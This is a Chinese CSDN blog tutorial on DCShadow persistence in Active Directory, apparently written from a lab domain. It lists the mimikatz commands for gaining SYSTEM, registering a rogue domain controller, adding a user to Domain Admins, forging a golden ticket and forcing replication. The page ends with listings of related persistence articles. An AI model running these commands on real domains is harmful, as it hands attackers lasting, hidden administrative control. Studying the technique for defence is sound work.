域权限维持(DCShadow)

已于 2023-03-24 23:58:45 修改
阅读量402 收藏 1
点赞数
分类专栏: 域安全 文章标签: 信息安全 网络安全 安全 网络 系统安全
于 2023-03-21 18:25:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129679602
版权
文章介绍了DCShadow技术,这是一种利用mimikatz工具在拥有域管理员权限的情况下,创建恶意域控并进行数据同步以维持高权限的方法。通过修改用户属性,如将用户添加到DomainAdmins组,然后利用黄金票据和DCShadow进行强制同步,实现权限维持。整个过程包括获取System权限、修改对象属性和强制域复制等步骤。
摘要由CSDN通过智能技术生成

文章目录

DCShadow简述
DCShadow属于域权限维持的手段之一,利用该技术需要具有域管理员权限或者
企业管理员权限,创建恶意域控然后利用域控间正常同步数据的功能将恶意域控
上的恶意对象同步到正在运行的正常域控上。
DCShadow利用(mimikatz)
利用流程简述:
	1.通过DCShadow更改配置框架和注册SPN,从而实现在目标获得目录内注册一个
	伪造的恶意域控,并且使伪造的恶意域控能被其他正常域控认可,能够参与域复制。
	2.在伪造的域控上更改获得目录数据。
	3.强制触发域复制,使得指定的新对象或修改后的属性能够同步进入其他正常的域控。
mimikatz利用步骤:
	1.使用mimikatz获取System权限。
	2.使用mimikatz进行数据更改监听。
	3.新窗口导入域管权限执行mimikatz执行域控同步数据。		
利用步骤1:
	使用mimikatz使得当前进程具有System权限。
	!+
	!processtoken
	token::whoami

在这里插入图片描述

利用步骤2:
	修改用户liangfeifan的primarygroupid值为512,即添加到Doamin Admins组中。
	lsadump::dcshadow /object:CN=liangfeifan,CN=Users,DC=test,DC=com /attribute:primarygroupid /value:512

在这里插入图片描述

利用步骤3:
	1.使用黄金票据+DCShadow
		黄金票据是可以进行DCShadow需要注意的ldap的域管白银票据是不行的因为rpc需要TGT的认证,
		因此只能黄金票据+DCShadow。
		打开新的mimikatz导入黄金票据:
		kerberos::golden /user:administrator /domain:test.com /sid:S-1-5-21-3042504039-1145428418-1324677547 /krbtgt:bdff817d8997011cb4405a615635143f /ptt
		进行同步:
		lsadump::dcshadow /push
	2.使用psexec打开域管cmd.exe进程并运行mimikatz.exe执行如下命令进行强制同步:
	lsadump::dcshadow /push

在这里插入图片描述

此时mimikatz监控端也将收到消息即将liangfeifan加到管理员组成功

在这里插入图片描述

总结
本篇文章讲述了黄金票据+DCShadow以及psexec的相关利用,
DCShadow是一种常见的域维持手段是通过伪造成恶意DC进行,
同步进行进而权限维持。
虚构之人
关注
专栏目录
内网渗透(七十五)之权限维持之DCShadow
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-16 613
2018年1月24日,在BlueHat安全会议上,安全研究员Benjamin Delpy 和 Vincent Le Toux 公布了针对微软活动目录的一种新型攻击技术------DCShaow。利用该攻击技术,具有管理员权限或企业管理员权限的恶意攻击者可以创建恶意控,然后利用控间正常同步数据的功能将恶意控上的恶意对象同步到正在运行的正常控上。由于执行该攻击操作需要管理员权限或企业管理员权限,因此该攻击技术通常用于权限维持
内网渗透(七十二)之权限维持之伪造
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-14 787
2022年1月10日,国外安全研究员Kaido发文称发现了一种新的伪造控方式,安全研究员只需要新建一个机器账户,然后修改机器账户的UserAccountControl属性为8192。活动目录就会认为这个机器账户就是控,然后就可以使用这个新建的机器账户进行DCSync操作了。由于修改机器账户的UserAccountControl属性需要内高权限,因此这种方式可以用来进行权限维持。这种权限维持方式与DCShadow类似,都是在内伪造控。
权限维持
weixin_43047908的博客
06-04 757
目录Windows 操作系统常见持久性后门Windows系统隐藏账户 当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门来维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。 Windows 操作系统常见持久性后门 几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘键后门、注册表后门、Windows 计划
权限维持-DSRM
whojoe的博客
05-17 703
权限维持-DSRM简介更改DSRM密码的方式通过明文指定通过账户同步DSRM利用使用DSRM账户连接的前提使用psexec或者wmiexec进行链接参考文章 简介 除了krbtgt服务帐号外,控上还有个可利用的账户:目录服务还原模式(DSRM)账户,这个密码是在DC安装的时候设置的,所以一般不会被修改。但是微软对DSRM帐号进行了限制,只允许在控制台登录。可以通过修改注册表的方式,将如下注册表键值: HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdmin
权限维持思路总结
最新发布
道一安全
08-16 1743
在通过某个漏洞或者通过用户机器抓取hash等手段拿到控制器权限后,如果不做权限维持,很有可能因为管理员将控的密码修改了或者讲漏洞修复了,导致控制器权限丢失,导致之前的努力都白费了。
权限维持】-DCShadow
qq_41617902的博客
01-20 269
DCShadow:伪造DC,通过控的同步功能,修改正常DC上的数据达到凭据窃取的目的
权限维持方法浅析.pdf
08-08
前情提要& 本集简介 Golden Ticket Silver Ticket SID History SID History -Golden Ticket Now More GOLDEN!...DCShadow BadGPO(Group Policy Objects) ACL (Access Control Lists) ACL -AdminSDHolder ACL -DCSync
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 1060
权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
权限维持
wuxinweii的博客
12-01 3860
DSRM后门: 目录服务恢复模式(DSRM,Directory Services Restore Mode),是Windows服务器控制器的安全模式启动选项。DSRM允许管理员用来修复或还原修复或重建活动目录数据库。活动目录安装后,安装向导提示管理员选择一个DSRM密码。有了密码,管理员可以防护数据库后门,避免之后出问题。但是它不提供访问或任何服务。如果DSRM密码忘了,可以使用命令行工具NTDSUtil进行更改。 在渗透测试中,可以使用DSRM对环境进行持久化操作。适用版本为windows serv
权限维持(重置DSRM密码与AdminSDHolder滥用)
qq_18811919的博客
03-25 930
本篇文章讲解内常见的权限维持手法的两种重置DSRM密码与AdminSDHolder滥用, 当然利用的姿势还有很多这里只是讲解了几种工具,下面我将写权限维持ACL滥用的 相关文章欢迎大家的支持。
权限维持】-非约束委派&约束委派
qq_41617902的博客
02-14 536
的非约束委派&约束委派利用
内网渗透-内的权限维持
lza20001103的博客
10-01 1082
内的权限维持 文章目录内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下内的权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
DCShadow
Ping_Pig的博客
10-26 425
讲在前面 内网的众多漏洞当中,我们就不得不介绍DCShadow和DCSync。笔者在国内外优秀的研究员的研究基础上,对相对比较优秀的文章做一次总结,尽量言简意赅的将这两个漏洞的意思表达清楚。DCSync已经做过一篇文章的介绍,本篇文章简单回顾。 DCShadow攻击简介 在具备管理员权限的前提下,攻击者可以创建伪造的控制器,将预先设定好的对象或对象属性同步复制到正在运行的服务器中 在目标AD中注册一个伪造的DC 使伪造的DC被其他DC认可,能够参与复制 强制触发复制,将预先设定好的对象
内网渗透测试:权限维持思路总结
qq_45521281的博客
02-21 2275
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录Windows 操作系统常见持久性后门Windows系统隐藏账户Shift 粘滞键后门(1)手动制作(2)Empire 下的利用注册表键后门(1)手动制作(2)Metasploit 下的利用(3)Empire 下的利用Windows 计划任务后门(1)利用 at 命令(2)利用 schtasks 命令(3)利用SharPersist工.
1、权限维持&控后门&SSP
m0_65842464的博客
02-25 793
很多时候拿下了一台服务器权限后,可能过几天就会无法控制,因为企业都会有专业人士定期查杀后门、杀毒检测、漏洞修复等,所以可能很快就会失去控制权限,而权限维持的目的是保证自己的权限不会掉,一直能够控制目标服务器。两种方法都是盗取身份认证文件,便于长久访问的权限维持,第一种方法重启后失效,第二种方法重启后才生效,各有各的好处,所以可以配合使用。
渗透之DCShadow攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-11 1199
2018年1月24日,Benjamin Delpy(神器 Mimikatz 的作者)和 Vincent Le Toux 在 BlueHat IL 会议期间公布了针对活动目录的一种新型攻击技术 DCShadow。在具备管理员权限条件下,攻击者可以创建伪造的控制器,将预先设定的对象或对象属性复制到正在运行服务器中。DCSync 从服务器复制出东西,DCShadow 是将数据复制至服务器。
DCShadow攻击复现
qq_39030256的博客
11-17 851
1.DCShadow 实测才是硬道理! 原理暂时不添加,只梳理执行流程。 2.测试环境 DC:Windows server 2012 :tony.local 主机:Windows server 2016 已加 2.1.涉及到的账户 2.1.1.管理组账户 账户名:test 2.1.2.普通账户 账户名:dc 3.实验流程-1 3.1.创建窗口A 登录主机Windows server 2016本地账 3.1.1.右键管理员打开权限mimikatz 3...
Kerberos安全系列(27)-DCShadow测试技术分析
prettyX的博客
02-16 501
2018年1月24日,Benjamin Delpy(神器Mimikatz的作者)和Vincent Le Toux在BlueHat IL会议期间公布了针对活动目录的一种新型攻击技术“DCShadow”。最新版的Mimikatz已经集成了这个功能。 在具备管理员权限条件下,攻击者可以创建伪造控制器,将预先设定的对象或对象属性复制到正在运行的服务器中。 在具备管理员权限,还需要这种方法吗?...
渗透技术详解
文档详细列举了多个Windows系统管理命令,这些命令在环境中用于信息收集、权限提升和信任关系分析,是安全专业人士进行渗透测试或防御时的重要工具。" 本文档详细介绍了在渗透过程中的各种步骤和命令,以下是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值